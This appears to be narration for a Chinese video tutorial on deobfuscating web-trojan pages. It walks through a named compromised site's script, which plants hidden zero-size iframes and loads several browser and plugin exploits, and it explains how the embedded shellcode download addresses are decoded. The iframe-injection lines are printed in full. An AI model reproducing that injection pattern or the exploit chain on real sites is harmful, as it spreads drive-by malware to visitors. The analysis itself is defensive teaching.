网马解密三--网页解密初探2

请注意：动画内如含广告，则该广告与本站无任何关系，为作者个人宣传，网络交易风险自负

现在解上次的解密初探1。
大家看了那些旧的教程和解密初探1以后应该可以掌握最基本的那些操作了吧。
我们这一次实战网马解密。我做的比较快。大家只能多看几遍复习练习些了。
http://www.scanw .com/blog/
这是我们公司的站点，大家可以在上面看到一些挂马的咨讯。
也欢迎大家测试我们的反挂马IE插件：）
可以在这里看到。
http://www.scanw.com/
哈哈。不废话了~干活。
http://www.exploer.cn/
就拿这个网站来解密吧。
document.writeln("<iframe src=1.htm width=0 height=0></iframe>");document.writeln("<iframe src=2.htm width=0 height=0></iframe>");document.writeln("<iframe src=3.htm width=0 height=0></iframe>");document.writeln("<iframe src=4.htm width=0 height=0></iframe>");document.writeln("<iframe src=5.htm width=0 height=0></iframe>");document.writeln("<iframe src=6.htm width=0 height=0></iframe>");document.writeln("<iframe src=12.htm width=0 height=0></iframe>");document.writeln("<iframe src=ani.gif width=0 height=0></iframe>");document.writeln("<iframe src=tj.htm width=0 height=0></iframe>");
这个页面只是加花，没有加密。大家可以路过。
是一个06014网马。这个是病毒地址……
这是很黄很暴力的US-ASCII字符加密……我们来用用工具比较方便。
这是7jdg写的一东西很实用。
10072CEC-8CC1-11D1-986E-00A0C955B42E
应该是07004了……
果然。我们来解地址~
这是一段SHELLCODE。地址在里面。unescape，这个可不是普通的unescape。
要进行SHELLCODE编码的转换。
我有一个工具哈哈。
地址出来了。
这个编码的原理很简单。就是2位2位的换位置，然后转成ASCII，例如8108就成了0881
然后进行16进制的ASCII转换就好了。
我偷懒了。用自己以前写的一小东西……就不自己换了。其实很简单的。
就是2个2个换位置。换好了以后ASCII转换。看好了。特别粘贴的HEX。
……
继续。
……06014加花免杀。
我们路过。
没有加密的。
F3E70CEA-956E-49CC-B444-73AFE593AD7F
讯雷5EXP……
我们百度一下就可以确认的。应该是最早期的那个漏洞。
有些慢……
一样~
确认无误。
= =|||
又见 shellcode
我们来解地址：
照上面教的方法可以手工解，大家也可以到网上找工具吧……我这里有个工具作者不让公开……
继续了。
REAL漏洞~
这是ShellCode的地址了。
我们来用用本G写的小玩具解密。可以从我BLOG下载到的。
= =+地址出来了~
继续下一个漏洞。
看到亲爱的document.write。虽然我们可以不靠它。不过……
那些ASCII经过了处理……a^145
麻烦。所以我们还是不要手工进行编码转换了。我们来改document.write/
alert之。
又是很黄很暴力的06014漏洞……
整容过的。所以比较难认。
= =b瑞星远程执行漏洞！
哈哈。
新玩意。看看我写的公告。CB偷我的……
BLOG是外国服务器有些慢。
找错了……
看来这个漏洞是无法执行的了……
那些使用网马的人肯定被骗了……
因为。。。
看过漏洞代码的人都知道。这个不是直接写EXE地址然后下载执行的漏洞，而是要编写DLL型的Downloader
然后在BaseURL里写那个DLL打包成ZIP的地址的目录……所以写EXE地址的人都是超人。很YY。
看来是用了这个工具了……
大汗一个。
继续下一个漏洞。
= =|||我事先没有试过。。所以。。貌似连接不上这个页面的。
路过。下一个。
看来只是做统计流量代码的脚本调用。
至此网马解密完毕……
我们还没有见到QVOD漏洞。哈哈。
我弄一个给大家看看~
没有错了。大家应该看一些比较有公信力的站点。因为误导信息还是满多的。
解解SHELLCODE。